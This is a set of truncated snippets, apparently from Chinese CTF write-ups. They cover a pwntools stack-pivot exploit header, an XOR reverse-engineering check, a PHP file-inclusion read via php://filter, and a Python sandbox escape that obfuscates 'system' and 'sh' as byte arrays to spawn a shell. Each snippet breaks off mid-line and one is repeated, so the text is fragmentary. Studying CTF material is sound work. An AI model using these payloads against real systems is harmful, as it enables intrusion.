这里buf偏移是0x110,经典栈迁移了,先放上exp: from pwn import * from LibcSearcher import * context(os='linux',arch='amd64',log_level='debug') io=remote("node5.anna.nssctf.cn",28065) #io=process("./pwn") elf=ELF("./pwn") #libc=ELF("./libc-2.27.so") main_addr=0x4010D0 leave...
PWN 我不会了 REVERSE x0r 一道简单的逆向分析 _main(); puts("please input your flag!"); scanf("%s", Str); if ( strlen(Str) != 22 ) { printf("strlen error!"); exit(0); } for ( i = 0; i <= 21; ++i ) { if ( arr[i] != (Str[i] ^ 0x34) + 900 )//输入值和数...
__import__ Traceback (most recent call last): File "/home/ctf/./server.py", line 84, in <module> print(expr(input_data)) File "/home/ctf/./server.py", line 69, in expr m = safeeval.test_expr(n, blocklist_codes) File "/usr/local/lib/python3.10/dist-packages/pwnlib/util/sa...
代码语言:javascript 代码运行次数:0 运行 AI代码解释 <?php//WEB手要懂得搜索//flag in ./flag.phpif(isset($_GET['filter'])){$file=$_GET['filter'];if(!preg_match("/flag/i",$file)){die("error");}include($file);}else{highlight_file(__FILE__);} 文件包含,直接base64读文件即可 php...
这道题没给附件,直接连上看看 这里一开始用().__class__.__base__.__subclasses__()[-4].__init__.__globals__[bytes([115,121,115,116,101,109]).decode()](bytes([115,104]).decod
PWN 我不会了 REVERSE x0r 一道简单的逆向分析 _main(); puts("please input your flag!"); scanf("%s", Str); if ( strlen(Str) != 22 ) { printf("strlen error!"); exit(0); } for ( i = 0; i <= 21; ++i ) { if ( arr[i] != (Str[i] ^ 0x34) + 900 )//输入值和数...